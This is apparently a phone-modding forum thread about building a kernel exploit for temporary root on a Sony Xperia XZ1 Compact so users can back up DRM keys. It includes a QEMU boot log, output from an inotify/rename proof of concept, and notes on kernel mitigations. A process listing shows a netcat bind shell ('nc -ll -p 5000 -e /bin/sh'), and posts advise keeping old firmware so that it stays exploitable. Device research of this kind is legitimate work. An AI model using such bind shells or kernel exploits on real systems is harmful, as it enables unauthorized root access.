[ 0.893331] UDP-Lite hash table entries: 1024 (order: 3, 32768 bytes)
[ 0.895278] NET: Registered protocol family 1
[ 0.895829] PCI: CLS 0 bytes, default 64
[ 0.907093] Trying to unpack rootfs image as initramfs...
[ 1.813394] Freeing initrd memory: 10856K (ffffffc008000000 - ffffffc008a9a000)
[ 1.839873] audit: initializing netlink subsys (disabled)
[ 1.841323] audit: type=2000 audit(1.830:1): initialized
[ 1.843654] Initialise system trusted keyring
[ 1.845285] vmscan: error setting kswapd cpu affinity mask
[ 1.868530] VFS: Disk quotas dquot_6.6.0
[ 1.869111] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
[ 1.877043] Registering sdcardfs 0.1
[ 1.879381] fuse init (API version 7.23)
[ 1.880925] SELinux: Registering netfilter hooks
[ 1.883759] pfk_ecryptfs [pfk_ecryptfs_init]: PFK ecryptfs inited successfully
[ 1.883827] pfk_ext4 [pfk_ext4_init]: PFK EXT4 inited successfully
[ 1.883940] pfk [pfk_init]: Driver initialized successfully
[ 1.906531] Key type asymmetric registered
[ 1.906667] Asymmetric key parser 'x509' registered
[ 1.907447] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 251)
[ 1.907643] io scheduler noop registered
[ 1.907745] io scheduler deadline registered
[ 1.908491] io scheduler cfq registered (default)
[ 1.914647] mdss_dsi_status_init: DSI status check interval:5000
[ 1.924056] _smem_log_init: no log or log_idx allocated
[ 1.924109] smem_log_initialize: init failed -19
[ 1.928406] spcom [spcom_init]: spcom driver Ver 1.0 23-Nov-2015.
[ 1.930476] audio_notifer_reg_service: service SSR_MODEM is in use
[ 1.935741] pil: failed to find qcom,msm-imem-pil node
[ 1.943836] msm_serial: driver initialized
[ 1.944825] msm_serial_hs module loaded
[ 1.999765] diag: Unable to register MHI read channel for 0, err: -22
[ 2.001287] diag: Unable to initialze diagfwd bridge, err: -12
[ 2.006917] Unable to detect cache hierarchy from DT for CPU 0
[ 2.053950] brd: module loaded
[ 2.078315] loop: module loaded
[ 2.081406] zram: Added device: zram0
[ 2.091074] tof_sensor_init: Initialize i2c driver
[ 2.091234] tof_sensor_init: Added i2c driver rc = 0Initialize TCS3490 driver
[ 2.091447] TCS3490 added i2c driver rc = 0<6>[ 2.097314] SCSI Media Changer driver v0.25
[ 2.098726] Ethernet Channel Bonding Driver: v3.7.1 (April 27, 2011)
[ 2.111375] tun: Universal TUN/TAP device driver, 1.6
[ 2.111422] tun: (C) 1999-2004 Max Krasnyansky <[email protected]>
[ 2.111816] sky2: driver version 1.30
[ 2.112935] PPP generic driver version 2.4.2
[ 2.113685] PPP BSD Compression module registered
[ 2.113776] PPP Deflate Compression module registered
[ 2.113968] PPP MPPE Compression module registered
[ 2.114073] NET: Registered protocol family 24
[ 2.121575] usb_host_ext_event has been registered!
[ 2.122073] usbcore: registered new interface driver usb-storage
[ 2.122469] usbcore: registered new interface driver usb_ehset_test
[ 2.125553] msm_sharedmem: sharedmem_register_qmi: qmi init successful
[ 2.126057] diag: failed to find diag_dload imem node
[ 2.128723] mousedev: PS/2 mouse device common for all mice
[ 2.129813] usbcore: registered new interface driver xpad
[ 2.131793] stmvl53l0_init: Enter
[ 2.131865] stmvl53l0_init_cci: Enter
[ 2.132239] stmvl53l0_init_cci: End
[ 2.132288] stmvl53l0_init: End
[ 2.132729] fpc1145_init OK
[ 2.133628] i2c /dev entries driver
[ 2.138308] ------------[ cut here ]------------
[ 2.138340] WARNING: at /home/hudsonslave/root/workspace/offbuild_pre-yoshino2-2.0.0_android_matrix/HUDSON_PRODUCT/lilac/HUDSON_VARIANT/user/label/CM/kernel/msm-4.4/drivers/media/platform/msm/camera_v2/msm.c:401
[ 2.138361] Modules linked in:
[ 2.138390]
[ 2.138527] CPU: 1 PID: 1 Comm: swapper/0 Tainted: G W 4.4.74-perf+ #1
[ 2.138558] Hardware name: linux,dummy-virt (DT)
[ 2.138601] task: ffffffc0784d8000 ti: ffffffc0784b4000 task.ti: ffffffc0784b4000
[ 2.138639] PC is at msm_sd_register+0x198/0x1fc
[ 2.138666] LR is at msm_sensor_init_module+0x114/0x1b8
[ 2.138686] pc : [<ffffff800897d1fc>] lr : [<ffffff8009c47ab0>] pstate: 60400145
[ 2.138701] sp : ffffffc0784b7d20
[ 2.138735] x29: ffffffc0784b7d20 x28: ffffff8009c82838
[ 2.138770] x27: ffffff8009c735a0 x26: ffffff8009c73570
[ 2.138800] x25: ffffff8009c004b4 x24: 0000000000000000
[ 2.138830] x23: ffffff800aa4b530 x22: ffffff800aa4b528
[ 2.138869] x21: ffffff800aa4b000 x20: ffffff800a833000
[ 2.138907] x19: ffffff800aa4b000 x18: 00000000deab7ec7
[ 2.138937] x17: 00000000432aff97 x16: 0000000000000001
[ 2.138966] x15: 0000000000000003 x14: 0ffffffffffffffe
[ 2.138995] x13: 0000000000000030 x12: 0101010101010101
[ 2.139025] x11: ff7f7f7f7f7f7f7f x10: fdff646b74636e6c
[ 2.139054] x9 : 0000000000000000 x8 : ffffffc076698e00
[ 2.139083] x7 : 0000000000000000 x6 : ffffffc076698c28
[ 2.139111] x5 : 0000000000000040 x4 : ffffff800aa4b088
[ 2.139140] x3 : 000000000000000e x2 : 0000000000020006
[ 2.139169] x1 : ffffffc076698c00 x0 : ffffffc076698c28
[ 2.139200]
[ 2.139200] PC: 0xffffff800897d1bc:
[ 2.139222] d1bc 12800002 52800023 f94046a4 97fef414 2a0003f3 37f80433 52800a20 b90072a0
[ 2.139580] d1dc b943aa80 b90076a0 f9406a80 b4000320 f90012a0 52800000 f9007ab4 17ffffc5
[ 2.139939] d1fc d4210000 12800080 f94013f5 a94153f3 a8c37bfd d65f03c0 d4210000 128002a0
[ 2.140339] d21c f94013f5 a94153f3 a8c37bfd d65f03c0 12800173 f9407aa0 b4000080 97fef7df
[ 2.140723]
[ 2.140723] LR: 0xffffff8009c47a70:
[ 2.140753] 7a70 f9006a77 b900be64 9100a260 97b3c52d f94296a1 52a00043 528000c2 91038020
[ 2.141119] 7a90 72a00042 b9005023 528001c3 f9002420 9100a020 b9006023 b9015822 97b4d56e
[ 2.141488] 7ab0 2a0003f3 340001e0 9125a280 9101e000 79404401 36100381 f0ffb482 f0ffe3e1
[ 2.141872] 7ad0 912f2042 91386021 9101e042 52801803 aa0203e4 2a1303e5 979e0bdd 14000012
[ 2.142246]
[ 2.142246] SP: 0xffffffc0784b7ce0:
[ 2.142275] 7ce0 09c47ab0 ffffff80 784b7d20 ffffffc0 0897d1fc ffffff80 60400145 00000000
[ 2.142660] 7d00 764eba80 ffffffc0 09c4799c ffffff80 ffffffff ffffffff 09c47a80 ffffff80
[ 2.143027] 7d20 784b7d50 ffffffc0 09c47ab0 ffffff80 76698c00 ffffffc0 0a833000 ffffff80
[ 2.143401] 7d40 0aa4b000 ffffff80 00000000 00000000 784b7d90 ffffffc0 08083adc ffffff80
[ 2.143841]
[ 2.143883] ---[ end trace cf17d4d9cad0286d ]---
[ 2.143920] Call trace:
[ 2.143951] Exception stack(0xffffffc0784b7b50 to 0xffffffc0784b7c80)
[ 2.144022] 7b40: ffffff800aa4b000 0000008000000000
[ 2.144134] 7b60: 0000000042b66000 ffffff800897d1fc ffffff8031303531 cb88537fdc8ba64a
[ 2.144253] 7b80: ffffffc0784b7c10 ffffff80083aa2d4 ffffffc0784b7d90 00000000ffffffd8
[ 2.144366] 7ba0: ffffff800923e648 0000000000000800 0000000000000000 ffffffc0764eba80
[ 2.144480] 7bc0: ffffff800a7f1000 ffffffc0764f0b00 ffffffc0784b7c10 ffffff80083aa208
[ 2.144593] 7be0: ffffffc0784b7d90 00000000ffffffd0 ffffffc076698c28 ffffffc076698c00
[ 2.144707] 7c00: 0000000000020006 000000000000000e ffffff800aa4b088 0000000000000040
[ 2.144821] 7c20: ffffffc076698c28 0000000000000000 ffffffc076698e00 0000000000000000
[ 2.144934] 7c40: fdff646b74636e6c ff7f7f7f7f7f7f7f 0101010101010101 0000000000000030
[ 2.145057] 7c60: 0ffffffffffffffe 0000000000000003 0000000000000001 00000000432aff97
[ 2.145115] [<ffffff800897d1fc>] msm_sd_register+0x198/0x1fc
[ 2.145153] [<ffffff8009c47ab0>] msm_sensor_init_module+0x114/0x1b8
[ 2.145189] [<ffffff8008083adc>] do_one_initcall+0xc4/0x1dc
[ 2.145225] [<ffffff8009c00e68>] kernel_init_freeable+0x1a8/0x248
[ 2.145262] [<ffffff80091051c4>] kernel_init+0x18/0x138
[ 2.145291] [<ffffff80080830c0>] ret_from_fork+0x10/0x50
[ 2.146752] (NULL device *): sony_sensor_init_module: sony_sensor_init_module platform_driver_probe (0) 2326
[ 2.147185] (NULL device *): sony_sensor_init_module: sony_sensor_init_module platform_driver_probe (1) 2326
[ 2.147237] (NULL device *): sony_sensor_init_module: sony_sensor_init_module platform_driver_probe (0) 2353
[ 2.150963] ------------[ cut here ]------------
[ 2.150994] WARNING: at /home/hudsonslave/root/workspace/offbuild_pre-yoshino2-2.0.0_android_matrix/HUDSON_PRODUCT/lilac/HUDSON_VARIANT/user/label/CM/kernel/msm-4.4/drivers/media/platform/msm/camera_v2/msm.c:401
[ 2.151014] Modules linked in:
[ 2.151040]
[ 2.151073] CPU: 1 PID: 1 Comm: swapper/0 Tainted: G W 4.4.74-perf+ #1
[ 2.151093] Hardware name: linux,dummy-virt (DT)
[ 2.151115] task: ffffffc0784d8000 ti: ffffffc0784b4000 task.ti: ffffffc0784b4000
[ 2.151147] PC is at msm_sd_register+0x198/0x1fc
[ 2.151173] LR is at msm_buf_mngr_init+0x114/0x200
[ 2.151192] pc : [<ffffff800897d1fc>] lr : [<ffffff8009c484e8>] pstate: 60400145
[ 2.151208] sp : ffffffc0784b7d20
[ 2.151224] x29: ffffffc0784b7d20 x28: ffffff8009c82898
[ 2.151257] x27: ffffff8009c735a0 x26: ffffff8009c73570
[ 2.151286] x25: ffffff8009c004b4 x24: ffffff800aa6d000
[ 2.151316] x23: ffffff80092e0458 x22: ffffff800aa6d000
[ 2.151345] x21: ffffff800aa6d700 x20: ffffffc076698c00
[ 2.151374] x19: ffffff800aa4b000 x18: 00000000deab7ec7
[ 2.151403] x17: 00000000432aff97 x16: 0000000000000001
[ 2.151432] x15: 0000000000000003 x14: 0ffffffffffffffe
[ 2.151461] x13: 0000000000000008 x12: 0101010101010101
[ 2.151490] x11: ffffff800894aa7c x10: ffffff800894b560
[ 2.151519] x9 : 0000000000000000 x8 : 0000000000000000
[ 2.151547] x7 : 0000000000000000 x6 : ffffffc076698c20
[ 2.151583] x5 : ffffff80089f1e44 x4 : ffffff800aa4b088
[ 2.151613] x3 : 000000000000000d x2 : 0000000000040000
[ 2.151649] x1 : ffffffc076698c00 x0 : ffffffc076698c20
[ 2.151680]
[ 2.151680] PC: 0xffffff800897d1bc:
[ 2.151702] d1bc 12800002 52800023 f94046a4 97fef414 2a0003f3 37f80433 52800a20 b90072a0
[ 2.152054] d1dc b943aa80 b90076a0 f9406a80 b4000320 f90012a0 52800000 f9007ab4 17ffffc5
[ 2.152404] d1fc d4210000 12800080 f94013f5 a94153f3 a8c37bfd d65f03c0 d4210000 128002a0
[ 2.152769] d21c f94013f5 a94153f3 a8c37bfd d65f03c0 12800173 f9407aa0 b4000080 97fef7df
[ 2.153124]
[ 2.153124] LR: 0xffffff8009c484a8:
[ 2.153152] 84a8 f9008294 91288084 f90012a5 f90016a4 97b3c29e f9437f01 910322e2 52a00040
[ 2.153499] 84c8 528001a3 b9004820 91008020 f9006422 52a00082 b9005823 b9015022 97b4d2e0
[ 2.153848] 84e8 2a0003f4 34000140 9101c2e1 90ffe460 910ca000 52806be2 aa0103e3 2a1403e4
[ 2.154198] 8508 97951e9d 2a1403e0 1400002c f9437f02 b1008040 f9408841 f9003c35 54000100
[ 2.154553]
[ 2.154553] SP: 0xffffffc0784b7ce0:
[ 2.154580] 7ce0 09c484e8 ffffff80 784b7d20 ffffffc0 0897d1fc ffffff80 60400145 00000000
[ 2.154922] 7d00 764eba80 ffffffc0 09c483d4 ffffff80 ffffffff ffffffff 09c484bc ffffff80
[ 2.155277] 7d20 784b7d50 ffffffc0 09c484e8 ffffff80 092e0000 ffffff80 76698c00 ffffffc0
[ 2.155647] 7d40 0aa6d700 ffffff80 00000000 00000000 784b7d90 ffffffc0 08083adc ffffff80
[ 2.156069]
[ 2.156095] ---[ end trace cf17d4d9cad0286e ]---
[ 2.156117] Call trace:
[ 2.156143] Exception stack(0xffffffc0784b7b50 to 0xffffffc0784b7c80)
[ 2.156209] 7b40: ffffff800aa4b000 0000008000000000
[ 2.156324] 7b60: 0000000042b66000 ffffff800897d1fc 00000000ffffffff cb88537fdc8ba64a
[ 2.156432] 7b80: ffffffc0784b7c10 ffffff80083aa2d4 ffffffc0784b7d90 00000000ffffffd8
[ 2.156540] 7ba0: ffffff800923e648 ffffff80083a1150 ffffffc0766ef000 0000000000000800
[ 2.156649] 7bc0: 0000000000000000 ffffffc0764eba80 ffffffc0784b7c10 ffffff80083aa208
[ 2.156756] 7be0: ffffffc0784b7d90 00000000ffffffd0 ffffffc076698c20 ffffffc076698c00
[ 2.156865] 7c00: 0000000000040000 000000000000000d ffffff800aa4b088 ffffff80089f1e44
[ 2.156972] 7c20: ffffffc076698c20 0000000000000000 0000000000000000 0000000000000000
[ 2.157080] 7c40: ffffff800894b560 ffffff800894aa7c 0101010101010101 0000000000000008
[ 2.157188] 7c60: 0ffffffffffffffe 0000000000000003 0000000000000001 00000000432aff97
[ 2.157240] [<ffffff800897d1fc>] msm_sd_register+0x198/0x1fc
[ 2.157275] [<ffffff8009c484e8>] msm_buf_mngr_init+0x114/0x200
[ 2.157307] [<ffffff8008083adc>] do_one_initcall+0xc4/0x1dc
[ 2.157340] [<ffffff8009c00e68>] kernel_init_freeable+0x1a8/0x248
[ 2.157373] [<ffffff80091051c4>] kernel_init+0x18/0x138
[ 2.157401] [<ffffff80080830c0>] ret_from_fork+0x10/0x50
[ 2.157447] CAM-BUFMGR msm_buf_mngr_init:863 msm_buf_mngr_init: msm_sd_register error = -5
[ 2.164607] tsens_controller_is_present: tsens_controller_is_present: TSENS controller not available
[ 2.164687] _tsens_register_thermal: _tsens_register_thermal: TSENS early init not done
[ 2.165473] md: linear personality registered for level -1
[ 2.166120] device-mapper: uevent: version 1.0.3
[ 2.167337] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: [email protected]
[ 2.168421] device-mapper: req-crypt: dm-req-crypt successfully initalized.
[ 2.168421]
[ 2.170719] sdhci: Secure Digital Host Controller Interface driver
[ 2.170754] sdhci: Copyright(c) Pierre Ossman
[ 2.170813] sdhci-pltfm: SDHCI platform and OF driver helper
[ 2.175886] usbcore: registered new interface driver usbhid
[ 2.175928] usbhid: USB HID core driver
[ 2.176592] ashmem: initialized
[ 2.192929] hw perfevents: enabled with armv8_pmuv3 PMU driver, 1 counters available
[ 2.203890] usbcore: registered new interface driver snd-usb-audio
[ 2.225873] sony_hweffect_params_init
[ 2.228462] GACT probability NOT on
[ 2.228790] Mirror/redirect action on
[ 2.229052] u32 classifier
[ 2.229080] Actions configured
[ 2.229531] Netfilter messages via NETLINK v0.30.
[ 2.230447] nf_conntrack version 0.5.0 (16384 buckets, 65536 max)
[ 2.234582] ctnetlink v0.93: registering with nfnetlink.
[ 2.240127] xt_time: kernel timezone is -0000
[ 2.243542] ip_tables: (C) 2000-2006 Netfilter Core Team
[ 2.248215] arp_tables: (C) 2002 David S. Miller
[ 2.249607] Initializing XFRM netlink socket
[ 2.252047] NET: Registered protocol family 10
[ 2.262166] mip6: Mobile IPv6
[ 2.262432] ip6_tables: (C) 2000-2006 Netfilter Core Team
[ 2.264716] sit: IPv6 over IPv4 tunneling driver
[ 2.267729] NET: Registered protocol family 17
[ 2.268306] NET: Registered protocol family 15
[ 2.268815] bridge: automatic filtering via arp/ip/ip6tables has been deprecated. Update your scripts to load br_netfilter if you need this.
[ 2.268915] Ebtables v2.0 registered
[ 2.269846] l2tp_core: L2TP core driver, V2.0
[ 2.270120] l2tp_ppp: PPPoL2TP kernel driver, V2.0
[ 2.270188] l2tp_ip: L2TP IP encapsulation support (L2TPv3)
[ 2.270361] l2tp_netlink: L2TP netlink interface
[ 2.270880] l2tp_eth: L2TP ethernet pseudowire support (L2TPv3)
[ 2.270955] l2tp_ip6: L2TP IP encapsulation support for IPv6 (L2TPv3)
[ 2.271666] NET: Registered protocol family 27
[ 2.288350] Registered cp15_barrier emulation handler
[ 2.288510] Registered setend emulation handler
[ 2.291405] registered taskstats version 1
[ 2.291648] Loading compiled-in X.509 certificates
[ 2.302327] Loaded X.509 cert 'Build time autogenerated kernel key: 70cf1635829ba84ab2643804f0666714b694ca11'
[ 2.304493] Loaded X.509 cert 'Android: 7e4333f9bba00adfe0ede979e28ed1920492b40f'
[ 2.543600] Key type encrypted registered
[ 2.545603] modem_restart_late_init: Unable to create smem ramdump device.
[ 2.546929] spss_utils [spss_init]: spss-utils driver Ver 1.2 13-Jan-2017.
[ 2.547854] servloc: init_service_locator: Service Locator not enabled
[ 2.547905] servloc: pd_locator_work: Unable to connect to service locator!, rc = -19
[ 2.548122] audio_notifer_reg_service: service SSR_ADSP is in use
[ 2.558173] RNDIS_IPA module is loaded.
[ 2.560110] hctosys: unable to open rtc device (rtc0)
[ 2.568247] clock_late_init: Removing enables held for handed-off clocks
[ 2.568376] ALSA device list:
[ 2.568423] No soundcards found.
[ 2.569282] Warning: unable to open an initial console.
[ 2.706130] Freeing unused kernel memory: 10240K ...
Here few linux commands from linux shell under that kernel in qemu:
Code:
ps
PID USER COMMAND
1 0 init
2 0 [kthreadd]
3 0 [ksoftirqd/0]
4 0 [kworker/0:0]
5 0 [kworker/0:0H]
6 0 [kworker/u4:0]
7 0 [rcu_preempt]
8 0 [rcu_sched]
9 0 [rcu_bh]
10 0 [rcuop/0]
11 0 [rcuos/0]
12 0 [rcuob/0]
13 0 [rcuc/0]
14 0 [rcub/0]
15 0 [migration/0]
16 0 [migration/1]
17 0 [rcuc/1]
18 0 [ksoftirqd/1]
19 0 [kworker/1:0]
20 0 [kworker/1:0H]
21 0 [rcuop/1]
22 0 [rcuos/1]
23 0 [rcuob/1]
24 0 [netns]
25 0 [perf]
26 0 [smd_channel_clo]
27 0 [dsps_smd_trans_]
28 0 [lpass_smd_trans]
29 0 [mpss_smd_trans_]
30 0 [wcnss_smd_trans]
31 0 [rpm_smd_trans_g]
32 0 [ipa_usb_wq]
33 0 [deferwq]
34 0 [kworker/u4:1]
35 0 [writeback]
36 0 [kcompactd0]
37 0 [crypto]
38 0 [bioset]
39 0 [kblockd]
40 0 [md]
41 0 [devfreq_wq]
42 0 [governor_msm_ad]
43 0 [kworker/1:1]
44 0 [cfg80211]
45 0 [kworker/0:1]
71 0 [power_off_alarm]
72 0 [kswapd0]
73 0 [vmstat]
74 0 [fsnotify_mark]
75 0 [ecryptfs-kthrea]
107 0 [glink_ssr_wq]
108 0 [glink_lbsrv]
109 0 [glink_xprt_wq]
110 0 [apr_driver]
111 0 [glink_pkt_wq]
113 0 [diag_real_time_]
114 0 [diag_wq]
115 0 [DIAG_USB_diag]
116 0 [diag_cntl_wq]
117 0 [diag_dci_wq]
118 0 [DIAG_SMD_MODEM_]
119 0 [DIAG_SMD_MODEM_]
120 0 [DIAG_SMD_MODEM_]
121 0 [DIAG_SMD_MODEM_]
122 0 [DIAG_SMD_MODEM_]
123 0 [DIAG_SMD_LPASS_]
124 0 [DIAG_SMD_LPASS_]
125 0 [DIAG_SMD_LPASS_]
126 0 [DIAG_SMD_LPASS_]
127 0 [DIAG_SMD_LPASS_]
128 0 [DIAG_SMD_WCNSS_]
129 0 [DIAG_SMD_WCNSS_]
130 0 [DIAG_SMD_WCNSS_]
131 0 [DIAG_SMD_WCNSS_]
132 0 [DIAG_SMD_WCNSS_]
133 0 [DIAG_SMD_SENSOR]
134 0 [DIAG_SMD_SENSOR]
135 0 [DIAG_SMD_SENSOR]
136 0 [DIAG_SMD_SENSOR]
137 0 [DIAG_SMD_SENSOR]
138 0 [DIAG_SMD_DIAG_C]
139 0 [DIAG_SMD_DIAG_D]
140 0 [DIAG_SMD_DIAG_C]
141 0 [DIAG_SMD_DIAG_D]
142 0 [DIAG_SMD_DIAG_D]
143 0 [DIAG_SMD_CDSP_C]
144 0 [DIAG_SMD_CDSP_D]
145 0 [DIAG_SMD_CDSP_C]
146 0 [DIAG_SMD_CDSP_D]
147 0 [DIAG_SMD_CDSP_D]
148 0 [DIAG_SOCKMODEM_]
149 0 [DIAG_SOCKMODEM_]
150 0 [DIAG_SOCKMODEM_]
151 0 [DIAG_SOCKMODEM_]
152 0 [DIAG_SOCKMODEM_]
153 0 [DIAG_SOCKLPASS_]
154 0 [DIAG_SOCKLPASS_]
155 0 [DIAG_SOCKLPASS_]
156 0 [DIAG_SOCKLPASS_]
157 0 [DIAG_SOCKLPASS_]
158 0 [DIAG_SOCKWCNSS_]
159 0 [DIAG_SOCKWCNSS_]
160 0 [DIAG_SOCKWCNSS_]
161 0 [DIAG_SOCKWCNSS_]
162 0 [DIAG_SOCKWCNSS_]
163 0 [DIAG_SOCKSENSOR]
164 0 [DIAG_SOCKSENSOR]
165 0 [DIAG_SOCKSENSOR]
166 0 [DIAG_SOCKSENSOR]
167 0 [DIAG_SOCKSENSOR]
168 0 [DIAG_SOCKDIAG_C]
169 0 [DIAG_SOCKDIAG_D]
170 0 [DIAG_SOCKDIAG_C]
171 0 [DIAG_SOCKDIAG_D]
172 0 [DIAG_SOCKDIAG_D]
173 0 [DIAG_SOCKCDSP_C]
174 0 [DIAG_SOCKCDSP_D]
175 0 [DIAG_SOCKCDSP_C]
176 0 [DIAG_SOCKCDSP_D]
177 0 [DIAG_SOCKCDSP_D]
178 0 [DIAG_CNTL_SOCKE]
179 0 [DIAG_GLINK_DIAG]
180 0 [DIAG_GLINK_DIAG]
181 0 [DIAG_GLINK_DIAG]
182 0 [DIAG_GLINK_DIAG]
183 0 [DIAG_GLINK_DIAG]
185 0 [DIAG_USB_diag_m]
186 0 [kgsl-workqueue]
187 0 [kgsl-mementry]
188 0 [kgsl_worker_thr]
189 0 [bioset]
190 0 [bioset]
191 0 [bioset]
192 0 [bioset]
193 0 [bioset]
194 0 [bioset]
195 0 [bioset]
196 0 [bioset]
197 0 [bioset]
198 0 [bioset]
199 0 [bioset]
200 0 [bioset]
201 0 [bioset]
202 0 [bioset]
203 0 [bioset]
204 0 [bioset]
205 0 [bioset]
206 0 [bioset]
207 0 [bioset]
208 0 [bioset]
209 0 [bioset]
210 0 [bioset]
211 0 [bioset]
212 0 [bioset]
213 0 [bioset]
214 0 [memory_wq]
215 0 [qcrypto_seq_res]
216 0 [bond0]
217 0 [sharedmem_qmi_w]
218 0 [qmi_hndl0000000]
219 0 [msm_ipc_router]
220 0 [uether]
221 0 [k_ipa_usb]
222 0 [dm_bufio_cache]
223 0 [binder]
224 0 [hwbinder]
225 0 [vndbinder]
226 0 [uaudio_svc]
227 0 [qmi_hndl0000000]
228 0 [ipv6_addrconf]
229 0 [kworker/u4:2]
238 0 [msm_perf:events]
239 0 [rq_stats]
340 0 nc -ll -p 5000 -e /bin/sh
341 0 /bin/sh
344 0 ps
cat /proc/version
Linux version 4.4.74-perf+ ([email protected]) (gcc version 4.9.x 20150123 (prerelease) (GCC) ) #1 SMP PREEMPT Wed Aug 9 16:09:57 2017
cat /proc/cpuinfo
Processor : AArch64 Processor rev 0 (aarch64)
processor : 0
BogoMIPS : 125.00
Features : fp asimd evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x41
CPU architecture: 8
CPU variant : 0x1
CPU part : 0xd07
CPU revision : 0
processor : 1
BogoMIPS : 125.00
Features : fp asimd evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x41
CPU architecture: 8
CPU variant : 0x1
CPU part : 0xd07
CPU revision : 0
Hardware : Qualcomm Technologies, Inc Unknown CPU
Tried also again the inotify/rename poc, this time built statically for linux:
Code:
/exploit-aarch64-linux-gnu
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100��1����"
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : b, event->len : 16
Detected overwrite!!!
callrename done.
So it works also in qemu, running the kernel binary from the firmware (needed few binary patches to avoid hangs due to missing hw features), so this makes a very good playground for real exploit implementation - kernel offsets (after kaslr bypass) should hopefully match with the real device.
There is still a lot of work to do - anybody willing to help?
I'm sorry I can't help because I lack the skills to, but I will sure pay the amount I pledged in the DRM key backup/restore bounty thread, if you manage to pull it off and allow also non developers to do it!
Here an advise: anybody who likes to keep a possibility to backup drm keys should disable all updates so that the fw version stays at the one which a phone was bought with.
It is possible that Sony would disable downgrades since particular version - that is after all a google's recommendation for vendors:
google-urges-smartphone-partners-support-android-oreos-rollback-protection
And download the oldest fw version available (do not care about customization not matching your phone original) to have it handy in case Sony pulls the fw off.
It would be useful if anybody who already upgraded to the latest fw version tried if it is still possible to downgrade for example to the 47.1.A.2.281 discussed here and report the result.
@j4nn: Are all your observations so far specific to the XZ1C? As the exploit itself isn't inherent to the XZ1C, might it be worthwhile to crosspost this to the XZ1 and XZ1 Premium forums? The more eyeballs you can get on this idea, the better.
right, it may be useful - the mentioned vulnerabilities are not hardware dependent. In case of xz1 and xz1p, the same kernel source branch is shared differing only in kernel defconfig, changing hw dependent options.
Basically any oreo device which could be flashed with fw containing the mentioned CVEs could possibly use them to get temp root.
But I have only xz1c, this is what I can test with, so that's why it is posted here.
Feel free to link to this thread to get possibly some devs who might help to implement the exploit(s).
An interesting find: the kernel from 47.1.A.2.281 fw has following option in it's config:
CONFIG_CC_STACKPROTECTOR_REGULAR=y
It seems that this is changed to STRONG variant since 47.1.A.3.xxx firmwares.
That means stack based kernel exploits could still be possible with the 2.281 fw - for comparison in linux kernel:
- regular: 1015 of 36110 functions are stack-protected (2.81%)
- strong: 7401 of 36110 functions are stack-protected (20.5%)
Just for reference - following options are enabled:
- CONFIG_ARM64_SW_TTBR0_PAN: Privileged Access Never (PAN) sw emulation
- CONFIG_DEBUG_RODATA: Make kernel text and rodata read-only (Post-init read-only memory)
- CONFIG_RANDOMIZE_BASE: Randomize the address of the kernel image (KASLR)
- CONFIG_HARDENED_USERCOPY
- Privileged Execute Never (PXN) is obviously integrated by default (preventing user code execution with privilege mode)
j4nn said:
right, it may be useful - the mentioned vulnerabilities are not hardware dependent. In case of xz1 and xz1p, the same kernel source branch is shared differing only in kernel defconfig, changing hw dependent options.
Basically any oreo device which could be flashed with fw containing the mentioned CVEs could possibly use them to get temp root.
But I have only xz1c, this is what I can test with, so that's why it is posted here.
Feel free to link to this thread to get possibly some devs who might help to implement the exploit(s).
Click to expand...
Click to collapse
When you talk about xz1p is the Sony Xperia XZ Premium , no?
SilverGamer_YT said:
When you talk about xz1p is the Sony Xperia XZ Premium , no?
Click to expand...
Click to collapse
Yes, same Yoshino platform (even though maybe it would be a tad easier to work on Premium, due to it having nougat too)
mirhl said:
Yes, same Yoshino platform (even though maybe it would be a tad easier to work on Premium, due to it having nougat too)
Click to expand...
Click to collapse
If we have already unlocked bootloader we cannot backup our drmkeys
@SilverGamer_YT, obviously no way if already lost by official unlock
mirhl said:
Yes, same Yoshino platform (even though maybe it would be a tad easier to work on Premium, due to it having nougat too)
Click to expand...
Click to collapse
that's right, but on the other hand, useful only for that device.
I am wondering - there is no temp root yet for the Premium if it had nougat?
